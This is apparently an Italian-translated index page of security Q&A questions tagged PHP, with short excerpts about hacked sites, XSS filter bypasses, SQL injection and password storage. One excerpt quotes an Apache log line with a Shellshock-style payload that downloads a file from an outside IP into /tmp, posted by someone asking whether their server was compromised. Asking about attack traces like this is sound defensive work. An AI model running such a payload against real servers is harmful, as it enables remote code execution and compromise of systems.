Domande con tag 'php'

domande con tag
2
risposte

Strange Pharma Spam Sito risultante dal file DAT creato da SQL Injection?

Lavorare sulla pulizia di un compromesso del sito per un cliente. Lasciando da parte il fatto che il sito stia usando una serie di codici CodeIgniter personalizzati scritti da qualcuno che non aveva alcun concetto di sicurezza, mi sono imbattuto...
posta 22.07.2012 - 21:41
1
risposta

sigsegv in php5.3.10

Ho trovato una situazione di overflow in php5.3.10. Probabilmente non è "qualcosa di nuovo", ma se posso capirlo, mi aiuterà a trovare questo tipo di bug più velocemente in futuro. Che cosa posso fare per verificare come / cosa / dove si v...
posta 05.11.2012 - 08:21
1
risposta

Sito hackerato - Dove andare da qui? [chiuso]

Il nostro sito di e-commerce basato su Magento è stato violato durante il fine settimana, gli hacker sono riusciti a ottenere l'accesso ai file Magento e ad incorporare un codice criptato nel file get.php nella directory root. Sono riuscito a...
posta 10.06.2013 - 10:59
2
risposte

Come bypassare la funzione htmlentities () in PHP per ottenere un XSS?

Ecco la funzione del filtro PHP con cui ho a che fare: function xss_check_2($data) { return htmlentities($data, ENT_QUOTES); } Il codice sorgente dell'output (l'output è il nome, Peter Wazinck, in basso): <div id="main"> &l...
posta 21.12.2017 - 20:43
1
risposta

I registri di Apache mostrano l'esecuzione dei comandi

Mi chiedo se il mio server è compromesso o meno. Ho appena guardato il mio log e ho visto la seguente riga: IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/u...
posta 28.12.2017 - 20:24
2
risposte

è sicuro usare sha256 in hash 64 dati di byte casuali crittograficamente con 12 byte salt?

Ho letto da molte fonti che sha256 non è sicuro perché è veloce. Molti link che ho letto suggeriscono bcrypt . Tuttavia, voglio solo sapere che se i dati sono 64 byte crittograficamente casuali, l'attaccante sarà in grado di trovare la...
posta 08.02.2018 - 21:50
1
risposta

Correlazione tra richiesta del server e tempo di risposta e funzioni php integrate

C'è un modo per identificare quale funzione PHP integrata è usata in qualche dato script solo inviando una richiesta e ricevendo una risposta dal server remoto? Per semplificare, possiamo supporre che sia uno script PHP molto semplice che con...
posta 16.05.2017 - 22:40
1
risposta

Autenticazione SQL per l'autenticazione dell'utente [chiusa]

Questo meccanismo di autenticazione è vulnerabile all'iniezione SQL? In tal caso, come si potrebbe sfruttarlo e qual è il modo più efficace per mitigarlo? if (isset($_POST['userid']) && isset($_POST['password'])){ $username = $_POST...
posta 22.10.2017 - 18:18
2
risposte

Modifica della variabile in un file php su un server web

Quello che segue è un estratto di uno script PHP all'interno di un file HTML. Mi piacerebbe essere in grado di alterare la variabile quando mi viene servito il file HTML. C'è comunque da fare così? La maggior parte delle vulnerabilità che ho tro...
posta 14.09.2017 - 19:08
1
risposta

Quanto è sicuro conservare le password in un file non accessibile?

Quindi, stavo pensando a soluzioni alternative per salvare le password in file di testo (solo perché sono curioso), e ho pensato, e se avessi salvato il mio file da qualche parte che non è accessibile? Il mio server ha una cartella public_html i...
posta 19.03.2018 - 01:21